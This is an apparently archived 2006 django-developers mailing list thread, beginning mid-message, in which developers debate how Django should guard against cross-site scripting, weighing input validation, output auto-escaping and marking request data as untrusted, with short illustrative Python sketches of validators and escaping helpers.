everything we output, or apply some magical validator to everything
users input, we'll be safe.

There are no magic bullets. The best defense for a web application is
to have best practices applied at every layer, and that's what we need
to be developing and encouraging.

Simon Willison

unread,
Jun 22, 2006, 7:08:54 AM6/22/06
to django-d...@googlegroups.com
On 22 Jun 2006, at 08:48, James Bennett wrote:

> For given values of "validate", yes. It is, however, easy to write
> validator functions which will reject anything that looks like HTML,
> and HTML is the most important threat.

I disagree that it's easy to write that kind of validator function -
and I think trying to do so is a mistake. What if I want to post a
comment on a forum like this?

"""
Don't worry Timmy, links in HTML are easy - just use <a href="URL
HERE">LINK TEXT</a>
"""

That looks like HTML - because it is! But I had no intention of
messing anything up.

Cheers,

Simon

Simon Willison

unread,
Jun 22, 2006, 7:13:03 AM6/22/06
to django-d...@googlegroups.com

On 22 Jun 2006, at 04:50, James Bennett wrote:

>> following that, I think Django should, of the two options, cover the
>> majority, which I believe is "escape by default" and allow {%
>> autoescape off %}. For the sake of security, I'm really hoping to see
>> escaping automatically turned on.
>
> Has the world honestly learned not one single solitary thing from
> PHP's magic_quotes fiasco? Autoescaping all output by default is
> something that is unequivocally not acceptable.

Magic quotes escaped all INPUT by default, and did it based on a
global setting (which meant code couldn't be moved from one
environment to another if their global setting differed). The lessons
I take from this are:

1. Never have a global setting that might make code impossible to reuse
2. Don't make assumptions about how input data will be used.

Auto escaping output is not affected by either of these.

Cheers,

Simon

Deryck Hodge

unread,
Jun 22, 2006, 9:24:30 AM6/22/06
to django-d...@googlegroups.com
Hi, all. Yes, I like this much better, too.

> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.
>

I'd be interested to see how this looks. It'd be nice to just be able
to convert the string trusted/untrusted and have this be smart about
format. Seems a crucial step to me.

> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>
> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).
>

I'm not sure here either. I'd be inclined to go (c). If untrusted
strings make it to the db, it's the same scenario as forgetting to
escape. Seems we'd want to encourage best practices, not enforce.
But again, I'm not sure on this one. (b) would work just as well.

Flip a coin. ;-)

Cheers,
deryck

--
Deryck Hodge http://www.devurandom.org/
Samba Team http://www.samba.org/
To begin... To begin... How to start? I'm hungry.
I should get coffee. Coffee would help me think. --Charlie Kaufman

Michael Radziej

unread,
Jun 22, 2006, 9:38:33 AM6/22/06
to django-d...@googlegroups.com
Hi Jacob,

Jacob Kaplan-Moss wrote:
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

I'm not sure whether I missed a point; is this, for html, the same as escape?

Michael

James Bennett

unread,
Jun 22, 2006, 11:10:00 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Simon Willison <swil...@gmail.com> wrote:
> I disagree that it's easy to write that kind of validator function -
> and I think trying to do so is a mistake. What if I want to post a
> comment on a forum like this?

Then you'd get caught by the validator.

Thinking about the implications of disallowing HTML in inputs is
something people will need to do; in the particular case you bring up
a better policy would be to use escaping on output so that people who
post instructional HTML samples can do so and have them show up
properly.

Note also that the example you mention wouldn't work as the user
expects *unless* there's some escaping going on; otherwise it would
show a link, not the code ;)

But I'll rephrase anyway.

Writing a validator which catches things that look like HTML isn't
particularly hard. Figuring out how much it should catch and when to
use it can be hard.
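
A rough sketch of such a validator, assuming a plain regular expression
is good enough to spot "things that look like HTML". The names
TAG_PATTERN, LooksLikeHTML and has_no_html are made up for this example
and are not part of django.core.validators.

```python
import re

# Anything shaped like an opening or closing tag: "<a ...>", "</a>", "< b >".
TAG_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


class LooksLikeHTML(ValueError):
    """Raised when the submitted text contains something tag-shaped."""


def has_no_html(value):
    """Return the value unchanged, or raise if it looks like HTML."""
    if TAG_PATTERN.search(value):
        raise LooksLikeHTML("HTML is not allowed in this field.")
    return value


# Plain comparisons pass, because "<" is not followed by a tag name.
has_no_html("1 < 2 & 2 > 3")

# The instructional forum comment is rejected, as is harmless prose
# that merely happens to be tag-shaped.
for text in ('just use <a href="URL HERE">LINK TEXT</a>', "if a <b and c> d"):
    try:
        has_no_html(text)
    except LooksLikeHTML:
        print("rejected:", text)
```

The last case is the hard part: the pattern is easy to write, but
deciding how much it should catch is a policy question.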

waylan

unread,
Jun 22, 2006, 12:57:45 PM6/22/06
to Django developers
I've been following this thread since the get-go with interest, but am
a first time commenter here. Although I think the devs have a clear
picture, I get the feeling that some participants in this discussion
are getting input validation and output escaping confused, which is
generating lots of unnecessary discussion. Let me use an oversimplified
example to explain. Let's suppose a user submits the following text to
your app:

1 < 2 & 2 > 3

Now, that obviously is not html and as far as I can tell will not
create any obvious security problems, so assuming you have good
validators, that text should then pass validation and be written to the
db as is.

Some are suggesting that this text should be escaped before being
written to the db. It is true that the above text should be rendered as
follows in html/xml documents:

1 &lt; 2 &amp; 2 &gt; 3

However, this is where the problem arises. Suppose one needs to output
the text to a plain text file (such as an email or csv file)? If the
escaped text is in the db, it then would have to be 'unescaped' in
those cases. That is why escaping must remain in the template, and only
the template author will know if some data needs to be escaped in that
particular case (regardless of his (lack of) understanding of XSS).
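
As a minimal sketch of this, assuming Python's standard html.escape as
the escaper (render_html and render_plain are hypothetical helpers, not
Django functions): the stored value stays untouched, and each output
path decides for itself whether to escape.

```python
import html

# Stored in the database exactly as the user submitted it.
user_text = "1 < 2 & 2 > 3"


def render_html(value):
    """HTML output: escape at the moment of rendering."""
    return "<p>" + html.escape(value) + "</p>"


def render_plain(value):
    """Plain-text output (an email body, say): nothing to escape or undo."""
    return value


print(render_html(user_text))   # <p>1 &lt; 2 &amp; 2 &gt; 3</p>
print(render_plain(user_text))  # 1 < 2 & 2 > 3
```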

I don't mean to undermine data validation. That is very important as
well and should never be overlooked. It's just that validation may not
be the end-all solution that some make it out to be. I understand that
good/better validation is coming/in the works, but this thread is about
escaping. I suppose escaping could be affected by how validation is
implemented but that brings up the chicken-egg question which I won't
ask.

It seems to me the real question is whether escaping should be on or
off by default and which would be more/less annoying. I think I'm with
Simon on this when he says he would have to try it both ways to see
which works best. Until then, I'll keep manually escaping things in the
template.

One more thing: regardless of whether escaping is on or off by default,
having the block tags to turn it on or off for an entire template (or
part of one) as well as raw and escape filters for individual variables
would be very handy and can certainly be implemented before the
'default behavior' decision is made.

James Bennett

unread,
Jun 22, 2006, 1:12:12 PM6/22/06
to django-d...@googlegroups.com
On 6/22/06, waylan <way...@gmail.com> wrote:
> Some are suggesting that this text should be escaped before being
> written to the db. It is true that the above text should be rendered as
> follows in html/xml documents:

I don't think we should escape before storing. I think we should
*validate* before storing. In other words, we do everything we can to
make sure that the data going into the db looks like it's supposed to
look.

Then on output you don't have to worry about it having been magically
pre-escaped somewhere along the line. You just escape if it's
something that you think needs escaping (again, don't have a single
point of failure -- validate the input *and* escape the output if
you've got a field that should never contain HTML), and get on with
life.

Michael Radziej

unread,
Jun 22, 2006, 1:13:58 PM6/22/06
to django-d...@googlegroups.com
Hi,

waylan wrote:
> I've been following this thread since the get-go with interest, but am
> a first time commenter here. Although I think the devs have a clear
> picture, I get the feeling that some participants in this discussion
> are getting input validation and output escaping confused which is
> generating lots of unnecessary discussion. Let me use an oversimplified
> example to explain. Let's suppose a user submits the following text to
> your app:
>
> 1 < 2 & 2 > 3
>
> Now, that obviously is not html and as far as I can tell will not
> create any obvious security problems, so assuming you have good
> validators, that text should then pass validation and be written to the
> db as is.

I assume this is about Jacob's proposal, and it's handling this
case correctly. Let's go through the steps he specified:

> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string

So you have an UntrustedString('1 < 2 & 2 > 3')

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.

This turns into '1 < 2 & 2 > 3', since it's safe.


> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.

does not apply

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).

does not apply--it's already a normal string, not an untrusted one.
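
The five steps could be sketched roughly as follows. This is only an
illustration of the idea, not an existing Django API: UntrustedString is
the name used above, while to_trusted, render_variable, save and
UntrustedDataError are hypothetical, and html.escape stands in for the
template engine's escaping.

```python
import html


class UntrustedString(str):
    """Step 1: marks data that came straight from the browser."""


class UntrustedDataError(Exception):
    """Step 5, option (b): untrusted data reached the database layer."""


def to_trusted(value, validator):
    """Steps 2 and 3: validate, then hand back an ordinary string."""
    validator(value)   # expected to raise if the value is unacceptable
    return str(value)  # a plain str, no longer marked as untrusted


def render_variable(value):
    """Step 4: the template layer escapes only what is still untrusted."""
    if isinstance(value, UntrustedString):
        return html.escape(value)
    return value


def save(value):
    """Step 5, option (b): refuse to store untrusted strings."""
    if isinstance(value, UntrustedString):
        raise UntrustedDataError("validate this value before storing it")
    return value


submitted = UntrustedString("1 < 2 & 2 > 3")
cleaned = to_trusted(submitted, validator=lambda v: None)

print(type(cleaned) is str)        # True
print(render_variable(submitted))  # 1 &lt; 2 &amp; 2 &gt; 3
print(save(cleaned))               # 1 < 2 & 2 > 3
```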

> One more thing: regardless of whether escaping is on or off by default,
> having the block tags to turn it on or off for an entire template (or
> part of one) as well as raw and escape filters for individual variables
> would be very handy and can certainly be implemented before the
> 'default behavior' decision is made.

;-)

Michael

Martina Oefelein

unread,
Jun 22, 2006, 3:20:43 PM6/22/06
to django-d...@googlegroups.com
Hi Jacob!

>
> On Jun 21, 2006, at 12:13 PM, Simon Willison wrote:
>> Rather than directly accessing GET and POST data
>> you do it through some mechanism that /guarantees/ the format of the
>> data returned - and raises an exception if it can't make that
>> guarantee. There is no possible way of invalid data ending up in the
>> email and age variables, so once you're past that bit of code you can
>> continue safe in the knowledge that the data is at least in the right
>> format.
>>
>> Obviously I haven't figured out exactly how the API for this should
>> look, but I think the core concept is really powerful.
>
> OK, *now* we're getting somewhere!
>

> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".
>

> Following that thread, I'm much more receptive to ideas involving
> "tainting" the data in request.GET and friends. Actually, I'm going
> to try to stay away from the word "taint" since it evokes both a
> nasty bit of perl *and* a nasty bit of male anatomy...
>

> Anyway, here's a rough sketch of how I'd picture enforced mistrust of
> browser-supplied data:
>

> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

Would this escape the string? Having read your comment about HTML
stored in a database as "&amp;lt;a href=&amp;quot;#link&amp;quot;&amp;gt;",
I would think: no.

So exactly what would the translation do?

Would it raise an exception if it encounters "dangerous" input?

And last, but not least: what criteria would it use to decide what is
bad and what is good input?

Perl's "untainting", if I remember correctly, just removes the taint
marker, it doesn't change the data itself. I think the rationale is
that by untainting it, you state explicitly that you have checked the
data for being safe *in the specific context of your application*. Is
that what you intend?

> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>

> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).

> PS: To be a bit more explicit about my thoughts on this whole thread:
> I'd say at this point any XSS proposal that involves some sort of
> mangling at the template level is pretty much a non-starter. So
> let's all focus our attentions on attacking this problem from the
> other direction.

For me, escaping is not only about XSS, but mainly about correct
output (correct both in the sense of syntactically well-formed
documents as well as in the sense of rendering it as expected). Some
security against XSS is "only" an additional benefit.

Not everybody outputs only html. People might also output other
formats (and Django templates can do this very well). Unfortunately,
each format has different requirements for escaping, so escaping
should be done on the output side. And I think the template engine
should not be tied to a particular format. That's why I think it
should be explicitly requested in the template itself.
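
A small sketch of why the format matters, assuming Python's standard
html and csv modules as the escapers (the ESCAPERS table and its keys
are invented for this example): the same value needs different
treatment depending on where it is written.

```python
import csv
import html
import io


def escape_html(value):
    """HTML: replace the characters that have markup meaning."""
    return html.escape(value)


def escape_csv(value):
    """CSV: quote the field and double any embedded quotes."""
    buffer = io.StringIO()
    csv.writer(buffer).writerow([value])
    return buffer.getvalue().rstrip("\r\n")


# The output format is named explicitly; nothing is guessed.
ESCAPERS = {
    "html": escape_html,
    "csv": escape_csv,
    "plain": lambda value: value,
}

value = 'He said "1 < 2", ok'
for name, escaper in ESCAPERS.items():
    print(name, "->", escaper(value))
```

The HTML escaper leaves the comma alone and the CSV escaper leaves the
"<" alone, so neither can substitute for the other.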

You could also guess the escaping from the extension, but I think
this would be too "magic".

ciao
Martina

waylan

unread,
Jun 22, 2006, 3:34:48 PM6/22/06
to Django developers
Michael Radziej wrote:
[snip]

>
> I assume this is about Jacob's proposal, and it's handling this
> case correctly. Let's go through the steps he specified:
>
[snip]

Whether it is handling this case correctly or not, it still needs to be
escaped in an html or xml template, but not in a plain text document.
Therefore, we still need the option of escaping (or not) at the
template level regardless of any validation in place, which was the
point I was trying to make. However, it appears that someone has now
changed the subject to 'validation' from 'escaping'...

waylan

unread,
Jun 22, 2006, 3:38:10 PM6/22/06
to Django developers

James Bennett wrote:
> On 6/22/06, waylan <way...@gmail.com> wrote:
> > Some are suggesting that this text should be escaped before being
> > written to the db. It is true that the above text should be rendered as
> > follows in html/xml documents:
>
> I don't think we should escape before storing. I think we should
> *validate* before storing. In other words, we do everything we can to
> make sure that the data going into the db looks like it's supposed to
> look.
>
> Then on output you don't have to worry about it having been magically
> pre-escaped somewhere along the line. You just escape if it's
> something that you think needs escaping (again, don't have a single
> point of failure -- validate the input *and* escape the output if
> you've got a field that should never contain HTML), and get on with
> life.
>
Uh, I thought that was the point I was making, or was I not clear
enough?

SmileyChris

unread,
Jul 5, 2006, 9:50:39 PM7/5/06
to Django developers
> Yes, Django should be accessible to newbies, but newbie-friendliness
> needs to be balanced against the needs of experienced web developers
> (who likely already know all about XSS).

To exhume an old horse and continue beating it, experienced web
developers may know all about XSS, but they will *still make mistakes*.
http://code.djangoproject.com/ticket/2290 is yet another example of
unescaped strings slipping past "experienced web developers".

Ok, ignore that vent. Now I'll try and be more constructive.

The following proposal assumes that we want template level
auto-escaping functionality and will provide it using the
escaped/non-escaped string idea from
http://code.djangoproject.com/wiki/AutoEscaping.

My proposal is that we don't use a {% autoescape on/off %} block tag or
a new |raw filter in the template source at all, but rather always use
the view to set the auto-escaping status.
The developer wanting to use autoescaping can simply mark any variables
which should be raw using markescaped() in the view.

Rather than hard coding the escape method into VariableNode.render(),
the additional methods would be changed:
- django.template, Template.render(..., escaper=None)
- django.template.loader, render_to_string(..., escaper=None)
and the VariableNode.render() would pass the string through the escaper
(if one is given).

It is reasonably straightforward to identify the filters which do
their own escaping. Like the wiki article says, they can simply be
flagged with markescaped() in the filters.

Since it's done explicitly in the view, hopefully this helps to appease
Adrian's fears of escape munging being too hidden / magical.

So nothing up to this stage even breaks backwards compatibility.

A further step (an implementation of the on-by-default idea) would be
to set the default to render_to_string(..., escaper=True) but raise an
exception unless escaper resolves to False or is a subclass of Escaper.
This would break backwards compatibility, but becomes even more
explicit, which I hear is a good thing ;)
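
Very roughly, and only as a sketch of the idea rather than actual
Django code: markescaped() and the escaper argument are the names from
the proposal above, while EscapedString and render_variable are
hypothetical stand-ins for the wiki's escaped-string type and for
VariableNode.render().

```python
import html


class EscapedString(str):
    """Marks a string that must not be escaped again."""


def markescaped(value):
    """Used in the view (or in a filter) to flag a value as already safe."""
    return EscapedString(value)


def render_variable(value, escaper=None):
    """Pass the value through the escaper, if one was given."""
    if escaper is None or isinstance(value, EscapedString):
        return str(value)
    return escaper(str(value))


# No escaper given: today's behaviour, nothing changes.
print(render_variable("<b>bold</b>"))

# The view opts in by supplying an escaper.
print(render_variable("<b>bold</b>", escaper=html.escape))

# Values flagged with markescaped() pass through untouched.
print(render_variable(markescaped("<b>bold</b>"), escaper=html.escape))
```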

Malcolm Tredinnick

unread,
Jul 5, 2006, 10:40:39 PM7/5/06
to django-d...@googlegroups.com
On Wed, 2006-07-05 at 18:50 -0700, SmileyChris wrote:
[...]

> My proposal is that we don't use a {% autoescape on/off %} block tag or
> a new |raw filter in the template source at all, but rather always use
> the view to set it the auto-escaping status.
> The developer wanting to use autoescaping can simply mark any variables
> which should be raw using markescaped() in the view.

One ongoing theme throughout this endless discussion has been trying to
avoid templates working differently in different contexts. Your proposal
again leads to a case where looking at the template does not provide
information about what is escaped or not. And, in fact, the answer to
that question is different depending upon which view is used to render
the template. That seems problematic.

Malcolm

SmileyChris

unread,
Jul 6, 2006, 12:09:35 AM7/6/06
to Django developers
Hi Malcolm,

Thanks for the comments.

Does the template source *need* to provide information on what is
escaped or not?

The view is handling a lot of the output format anyway, I personally
don't see a problem with looking there to see how a template is being
escaped.

Then again, I guess escaping is "presentation logic" and maybe it
should be coupled to the template source... any other thoughts, people?
